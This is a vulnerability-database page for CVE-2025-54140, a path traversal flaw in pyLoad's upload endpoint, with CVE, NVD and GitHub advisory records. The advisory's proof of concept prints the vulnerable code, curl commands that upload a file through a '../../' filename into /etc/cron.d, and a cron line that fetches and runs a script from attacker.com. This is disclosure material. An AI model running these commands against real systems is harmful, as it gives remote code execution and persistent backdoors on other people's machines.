cvelistv5 - cve-2025-54140

CVE-2025-54140 (GCVE-0-2025-54140)

Vulnerability from cvelistv5

Published

2025-07-22 21:34

Modified

2025-07-23 18:28

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Summary

pyLoad is a free and open-source Download Manager written in pure Python. In version 0.5.0b3.dev89, an authenticated path traversal vulnerability exists in the /json/upload endpoint of pyLoad. By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to: Remote Code Execution (RCE), local privilege escalation, system-wide compromise, persistence, and backdoors. This is fixed in version 0.5.0b3.dev90.

References

►

URL

Tags

	security-advisories@github.com	https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109
	security-advisories@github.com	https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0
	security-advisories@github.com	https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg

Impacted products

	Vendor	Product	Version
	pyload	pyload	Version: >= 0.5.0b3.dev89, < 0.5.0b3.dev90

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-54140",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-07-23T18:28:30.704049Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-07-23T18:28:44.036Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "pyload",
          "vendor": "pyload",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.5.0b3.dev89, \u003c 0.5.0b3.dev90"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "pyLoad is a free and open-source Download Manager written in pure Python. In version 0.5.0b3.dev89, an authenticated path traversal vulnerability exists in the /json/upload endpoint of pyLoad. By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to: Remote Code Execution (RCE), local privilege escalation, system-wide compromise, persistence, and backdoors. This is fixed in version 0.5.0b3.dev90."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-22T21:34:30.750Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg"
        },
        {
          "name": "https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0"
        },
        {
          "name": "https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109"
        }
      ],
      "source": {
        "advisory": "GHSA-xqpg-92fq-grfg",
        "discovery": "UNKNOWN"
      },
      "title": "pyLoad has Path Traversal Vulnerability in json/upload Endpoint that allows Arbitrary File Write"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-54140",
    "datePublished": "2025-07-22T21:34:30.750Z",
    "dateReserved": "2025-07-16T23:53:40.511Z",
    "dateUpdated": "2025-07-23T18:28:44.036Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-54140\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-07-22T22:15:38.390\",\"lastModified\":\"2025-07-25T15:29:44.523\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"pyLoad is a free and open-source Download Manager written in pure Python. In version 0.5.0b3.dev89, an authenticated path traversal vulnerability exists in the /json/upload endpoint of pyLoad. By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to: Remote Code Execution (RCE), local privilege escalation, system-wide compromise, persistence, and backdoors. This is fixed in version 0.5.0b3.dev90.\"},{\"lang\":\"es\",\"value\":\"pyLoad es un gestor de descargas gratuito y de c\u00f3digo abierto escrito en Python puro. En la versi\u00f3n 0.5.0b3.dev89, existe una vulnerabilidad de path traversal autenticado en el endpoint /json/upload de pyLoad. Al manipular el nombre de un archivo subido, un atacante puede cruzar fuera del directorio de carga previsto, lo que le permite escribir archivos arbitrarios en cualquier ubicaci\u00f3n del sistema accesible para el proceso pyLoad. Esto puede provocar: ejecuci\u00f3n remota de c\u00f3digo (RCE), escalada de privilegios locales, vulnerabilidad de todo el sistema, persistencia y puertas traseras. Esto se ha corregido en la versi\u00f3n 0.5.0b3.dev90.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-54140\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-07-23T18:28:30.704049Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-07-23T18:28:37.837Z\"}}], \"cna\": {\"title\": \"pyLoad has Path Traversal Vulnerability in json/upload Endpoint that allows Arbitrary File Write\", \"source\": {\"advisory\": \"GHSA-xqpg-92fq-grfg\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"pyload\", \"product\": \"pyload\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.5.0b3.dev89, \u003c 0.5.0b3.dev90\"}]}], \"references\": [{\"url\": \"https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg\", \"name\": \"https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0\", \"name\": \"https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109\", \"name\": \"https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"pyLoad is a free and open-source Download Manager written in pure Python. In version 0.5.0b3.dev89, an authenticated path traversal vulnerability exists in the /json/upload endpoint of pyLoad. By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to: Remote Code Execution (RCE), local privilege escalation, system-wide compromise, persistence, and backdoors. This is fixed in version 0.5.0b3.dev90.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-07-22T21:34:30.750Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-54140\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-07-23T18:28:44.036Z\", \"dateReserved\": \"2025-07-16T23:53:40.511Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-07-22T21:34:30.750Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

ghsa-xqpg-92fq-grfg

Vulnerability from github

Published

2025-07-21 21:16

Modified

2025-07-23 13:37

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Summary

`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write

Details

Summary

An authenticated path traversal vulnerability exists in the /json/upload endpoint of the pyLoad By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to:

Remote Code Execution (RCE)
Local Privilege Escalation
System-wide compromise
Persistence and backdoors

Vulnerable Code

File: src/pyload/webui/app/blueprints/json_blueprint.py

python @json_blueprint.route("/upload", methods=["POST"]) def upload(): dir_path = api.get_config_value("general", "storage_folder") for file in request.files.getlist("file"): file_path = os.path.join(dir_path, "tmp_" + file.filename) file.save(file_path) Issue: No sanitization or validation on file.filename, allowing traversal via ../../ sequences.

(Proof of Concept)

Clone and install pyLoad from source (pip install pyload-ng):

bash git clone https://github.com/pyload/pyload cd pyload git checkout 0.4.20 python -m pip install -e . pyload --userdir=/tmp/pyload

Or install via pip (PyPi) in virtualenv:

bash python -m venv pyload-env source pyload-env/bin/activate pip install pyload==0.4.20 pyload

Login and obtain session token bash curl -c cookies.txt -X POST http://127.0.0.1:8000/login \ -d "username=admin&password=admin"
Create malicious cron payload bash echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
Upload file with path traversal filename bash curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \ -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
On the next cron tick, a reverse shell or payload will be triggered.

BurpSuite HTTP Request

``` POST /json/upload HTTP/1.1 Host: 127.0.0.1:8000 Cookie: session=SESSION_ID_HERE Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor" Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash --------------------------d74496d66958873e-- ```

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pyload-ng"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.5.0b3.dev89"
            },
            {
              "fixed": "0.5.0b3.dev90"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.5.0b3.dev89"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54140"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-21T21:16:06Z",
    "nvd_published_at": "2025-07-22T22:15:38Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nAn **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of the `pyLoad` By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory, allowing them to **write arbitrary files to any location** on the system accessible to the pyLoad process. This may lead to:\n\n* **Remote Code Execution (RCE)**\n* **Local Privilege Escalation**\n* **System-wide compromise**\n* **Persistence and backdoors**\n\n---\n\n### Vulnerable Code\n\nFile: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109)\n\n```python\n@json_blueprint.route(\"/upload\", methods=[\"POST\"])\ndef upload():\n    dir_path = api.get_config_value(\"general\", \"storage_folder\")\n    for file in request.files.getlist(\"file\"):\n        file_path = os.path.join(dir_path, \"tmp_\" + file.filename)  \n        file.save(file_path) \n```\n**Issue**: No sanitization or validation on `file.filename`, allowing traversal via `../../` sequences.\n\n\n\n\n### (Proof of Concept)\n\n1. **Clone and install pyLoad from source** (`pip install pyload-ng`):\n\n```bash\ngit clone https://github.com/pyload/pyload\ncd pyload\ngit checkout 0.4.20\npython -m pip install -e .\npyload --userdir=/tmp/pyload\n```\n\n2. **Or install via pip (PyPi) in virtualenv:**\n\n```bash\npython -m venv pyload-env\nsource pyload-env/bin/activate\npip install pyload==0.4.20\npyload\n```\n\n\n1. **Login and obtain session token**\n```bash\ncurl -c cookies.txt -X POST http://127.0.0.1:8000/login \\\n  -d \"username=admin\u0026password=admin\"\n```\n\n2. **Create malicious cron payload**\n```bash\necho \"*/1 * * * * root curl http://attacker.com/payload.sh | bash\" \u003e exploit\n```\n\n3. **Upload file with path traversal filename**\n```bash\ncurl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \\\n  -F \"file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor\"\n```\n\n4. On the next cron tick, a reverse shell or payload will be triggered.\n\n### BurpSuite HTTP Request\n\n```\nPOST /json/upload HTTP/1.1\nHost: 127.0.0.1:8000\nCookie: session=SESSION_ID_HERE\nContent-Type: multipart/form-data; boundary=------------------------d74496d66958873e\n\n--------------------------d74496d66958873e\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../etc/cron.d/pyload_backdoor\"\nContent-Type: application/octet-stream\n\n*/1 * * * * root curl http://attacker.com/payload.sh | bash\n--------------------------d74496d66958873e--\n```",
  "id": "GHSA-xqpg-92fq-grfg",
  "modified": "2025-07-23T13:37:09Z",
  "published": "2025-07-21T21:16:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54140"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyload/pyload"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write"
}

fkie_cve-2025-54140

Vulnerability from fkie_nvd

Published

2025-07-22 22:15

Modified

2025-07-25 15:29

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Summary

References

▶	URL	Tags
	security-advisories@github.com	https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109
	security-advisories@github.com	https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0
	security-advisories@github.com	https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "pyLoad is a free and open-source Download Manager written in pure Python. In version 0.5.0b3.dev89, an authenticated path traversal vulnerability exists in the /json/upload endpoint of pyLoad. By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to: Remote Code Execution (RCE), local privilege escalation, system-wide compromise, persistence, and backdoors. This is fixed in version 0.5.0b3.dev90."
    },
    {
      "lang": "es",
      "value": "pyLoad es un gestor de descargas gratuito y de c\u00f3digo abierto escrito en Python puro. En la versi\u00f3n 0.5.0b3.dev89, existe una vulnerabilidad de path traversal autenticado en el endpoint /json/upload de pyLoad. Al manipular el nombre de un archivo subido, un atacante puede cruzar fuera del directorio de carga previsto, lo que le permite escribir archivos arbitrarios en cualquier ubicaci\u00f3n del sistema accesible para el proceso pyLoad. Esto puede provocar: ejecuci\u00f3n remota de c\u00f3digo (RCE), escalada de privilegios locales, vulnerabilidad de todo el sistema, persistencia y puertas traseras. Esto se ha corregido en la versi\u00f3n 0.5.0b3.dev90."
    }
  ],
  "id": "CVE-2025-54140",
  "lastModified": "2025-07-25T15:29:44.523",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-07-22T22:15:38.390",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-54140 (GCVE-0-2025-54140)

Vulnerability from cvelistv5

ghsa-xqpg-92fq-grfg

Vulnerability from github

Summary

Vulnerable Code

(Proof of Concept)

BurpSuite HTTP Request

fkie_cve-2025-54140

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature